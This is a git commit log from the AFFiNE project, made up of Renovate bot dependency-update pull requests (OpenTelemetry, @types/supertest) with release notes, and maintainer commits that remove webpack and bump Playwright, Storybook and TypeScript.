2026-03-02 13:59:38 +08:00
renovate[bot] 76d28aaa38 chore: bump up @types/supertest version to v7 (#14546)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@types/supertest](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/supertest) ([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/supertest)) | [`^6.0.2` → `^7.0.0`](https://renovatebot.com/diffs/npm/@types%2fsupertest/6.0.3/7.2.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@types%2fsupertest/7.2.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@types%2fsupertest/6.0.3/7.2.0?slim=true) |

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---


This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-02 13:58:48 +08:00
DarkSky c5d622531c feat: refactor copilot module (#14537) 2026-03-02 13:57:55 +08:00
renovate[bot] e249e2e884 chore: bump up opentelemetry (#14543)
This PR contains the following updates:

| Package | Change | [Age](https://docs.renovatebot.com/merge-confidence/) | [Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@opentelemetry/exporter-prometheus](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-exporter-prometheus) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-prometheus/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-prometheus/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/exporter-zipkin](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-exporter-zipkin) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fexporter-zipkin/2.5.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fexporter-zipkin/2.5.0/2.5.1?slim=true) |
| [@opentelemetry/host-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/host-metrics#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/host-metrics)) | [`0.38.2` → `0.38.3`](https://renovatebot.com/diffs/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fhost-metrics/0.38.3?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fhost-metrics/0.38.2/0.38.3?slim=true) |
| [@opentelemetry/instrumentation](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/instrumentation-graphql](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-graphql#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-graphql)) | [`^0.58.0` → `^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-graphql/0.60.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-graphql/0.58.0/0.60.0?slim=true) |
| [@opentelemetry/instrumentation-http](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-instrumentation-http) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-http/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-http/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/instrumentation-ioredis](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-ioredis#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-ioredis)) | [`^0.59.0` → `^0.60.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-ioredis/0.60.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-ioredis/0.59.0/0.60.0?slim=true) |
| [@opentelemetry/instrumentation-nestjs-core](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-nestjs-core#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-nestjs-core)) | [`^0.57.0` → `^0.58.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-nestjs-core/0.58.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-nestjs-core/0.57.0/0.58.0?slim=true) |
| [@opentelemetry/instrumentation-socket.io](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/main/packages/instrumentation-socket.io#readme) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/tree/HEAD/packages/instrumentation-socket.io)) | [`^0.57.0` → `^0.59.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2finstrumentation-socket.io/0.59.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2finstrumentation-socket.io/0.57.0/0.59.0?slim=true) |
| [@opentelemetry/sdk-metrics](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/sdk-metrics) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-metrics/2.5.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-metrics/2.5.0/2.5.1?slim=true) |
| [@opentelemetry/sdk-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/experimental/packages/opentelemetry-sdk-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`^0.211.0` → `^0.212.0`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-node/0.212.0?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-node/0.211.0/0.212.0?slim=true) |
| [@opentelemetry/sdk-trace-node](https://redirect.github.com/open-telemetry/opentelemetry-js/tree/main/packages/opentelemetry-sdk-trace-node) ([source](https://redirect.github.com/open-telemetry/opentelemetry-js)) | [`2.5.0` → `2.5.1`](https://renovatebot.com/diffs/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1) | ![age](https://developer.mend.io/api/mc/badges/age/npm/@opentelemetry%2fsdk-trace-node/2.5.1?slim=true) | ![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@opentelemetry%2fsdk-trace-node/2.5.0/2.5.1?slim=true) |

---

### Release Notes

<details>
<summary>open-telemetry/opentelemetry-js (@opentelemetry/exporter-prometheus)</summary>

### [`v0.212.0`](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js/compare/38924cbff2a6e924ce8a2a227d3a72de52fbcd35...ad92be4c2c1094745a85b0b7eeff1444a11b1b4a)

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/host-metrics)</summary>

### [`v0.38.3`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/host-metrics/CHANGELOG.md#0383-2026-02-25)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...630937db1575c652201558467ae5c449075f0881)

##### Bug Fixes

- **instrumentation-host-metrics:** unpin and update to systeminformation@^5.31.1 ([#3392](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3392)) ([e4ffdb4](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/e4ffdb43d160ace57420978da9c1855be653abe1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-graphql)</summary>

### [`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0600-2026-02-25)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **instrumentation-graphql:** add parent name in attributes of resolver span ([#3287](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3287)) ([ea2a90a](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/ea2a90a87b5b5a6d29f980a73e61cefa020ab81c))

### [`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-graphql/CHANGELOG.md#0590-2026-02-16)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*" ([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383)) ([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-ioredis)</summary>

### [`v0.60.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-ioredis/CHANGELOG.md#0600-2026-02-16)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*" ([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383)) ([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.58.0 to ^0.59.0

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib (@opentelemetry/instrumentation-nestjs-core)</summary>

### [`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-nestjs-core/CHANGELOG.md#0580-2026-02-16)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*" ([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383)) ([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

</details>

<details>
<summary>open-telemetry/opentelemetry-js-contrib
(@&#8203;opentelemetry/instrumentation-socket.io)</summary>

###
[`v0.59.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0590-2026-02-25)

[Compare
Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/0b33a118f289c0435a241c84c3c3923312fc2b98...630937db1575c652201558467ae5c449075f0881)

##### Features

- **deps:** lock file maintenance
([#3261](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3261))
([540926b](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/540926bffe713c591163abaf56fbb0e18aaf5b88))

### [`v0.58.0`](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/blob/HEAD/packages/instrumentation-socket.io/CHANGELOG.md#0580-2026-02-16)

[Compare Source](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/compare/7a5f3c0a09b6a2d32c712b2962b95137c906a016...0b33a118f289c0435a241c84c3c3923312fc2b98)

##### Features

- **deps:** update deps matching "@opentelemetry/\*"
([#3383](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/issues/3383))
([d3ac785](https://redirect.github.com/open-telemetry/opentelemetry-js-contrib/commit/d3ac7851d69d0781c2c631012937a73998b744e1))

##### Dependencies

- The following workspace dependencies were updated
  - devDependencies
    - [@opentelemetry/contrib-test-utils](https://redirect.github.com/opentelemetry/contrib-test-utils) bumped from ^0.58.0 to ^0.59.0

</details>

---

### Configuration

📅 **Schedule**: Branch creation - At any time (no schedule defined),
Automerge - At any time (no schedule defined).

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] If you want to rebase/retry this PR, check this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-03-01 21:19:09 +00:00
DarkSky 2cb171f553 feat: cleanup webpack deps (#14530)
#### PR Dependency Tree


* **PR #14530** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Breaking Changes**
  * Webpack bundler support removed from the build system
  * Bundler selection parameter removed from build and development
    commands

* **Refactor**
  * Build configuration consolidated to a single bundler approach
  * Webpack-specific build paths and workflows removed; development server
    simplified

* **Chores**
  * Removed webpack-related dev dependencies and tooling
  * Updated package build scripts for a unified bundle command

* **Dependencies**
  * Upgraded Sentry packages across frontend packages
    (react/electron/esbuild plugin)
2026-02-28 00:24:08 +08:00
DarkSky a4e2242b8d chore: bump playwright (#13947)
## Summary by CodeRabbit

* **Chores**
  * Updated Playwright test tooling to 1.58.2 across the repository and
    test packages.

* **Tests**
  * Improved end-to-end robustness: replaced fragile timing/coordinate
    logic with element-based interactions, added polling/retry checks for
    flaky asserts and async state, and simplified input/rename flows to
    reduce test flakiness.
2026-02-27 22:56:43 +08:00
DarkSky c90f173821 chore: bump deps (#14526)
#### PR Dependency Tree


* **PR #14526** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
  * Updated Storybook component development tooling to version 10.2.13 for
    improved stability and performance
  * Removed Chromatic integration from the component preview system

2026-02-27 20:17:06 +08:00
DarkSky e1e0ac2345 chore: cleanup deps (#14525)
#### PR Dependency Tree


* **PR #14525** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

## Summary by CodeRabbit

* **Chores**
  * Removed an unused development dependency.
  * Updated dotLottie/Lottie-related dependency versions across packages
    and replaced a removed player dependency with the new package.

* **Refactor**
  * AI animated icons now re-export from a shared component and are loaded
    only in the browser, reducing upfront bundle weight and centralizing
    icon assets.
2026-02-27 11:56:54 +08:00
DarkSky 046e126054 feat: bump typescript (#14507)
## Summary by CodeRabbit

* **Chores**
  * Upgraded TypeScript toolchain to v5.9.3 across packages and tooling.
  * Removed legacy ts-node and migrated developer tooling to newer
    runtimes (tsx/SWC) where applicable.
* **Documentation**
  * Updated developer CLI docs and runtime behavior notes to reflect the
    new loader/runtime for running TypeScript files; no changes to public
    APIs or end-user behavior.
2026-02-24 13:22:46 +08:00